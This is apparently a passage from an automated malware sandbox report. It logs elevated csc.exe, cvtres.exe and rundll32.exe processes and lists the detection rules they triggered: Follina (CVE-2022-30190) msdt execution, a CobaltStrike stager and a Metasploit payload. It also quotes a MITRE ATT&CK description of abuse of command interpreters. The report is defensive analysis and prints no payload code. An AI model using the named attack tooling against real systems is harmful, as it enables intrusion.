00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
Reputation:	moderate

Target ID:	18
Start time:	14:20:43
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
Imagebase:	0x140000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	19
Start time:	14:20:45
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
Imagebase:	0xc60000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	20
Start time:	14:21:20
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
Imagebase:	0x140000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	21
Start time:	14:21:28
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
Imagebase:	0xc60000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Target ID:	26
Start time:	14:21:47
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
Imagebase:	0x7ff638ba0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Target ID:	28
Start time:	14:21:49
Start date:	16/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
Imagebase:	0xc60000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Target ID:	30
Start time:	14:21:57
Start date:	16/06/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):
Commandline:	C:\Windows\\SysWOW64\\rundll32.exe
Imagebase:
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Cobaltbaltstrike_RAW_Payload_https_stager_x86, Description: Detects CobaltStrike payloads, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Avast Threat Intel Team Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre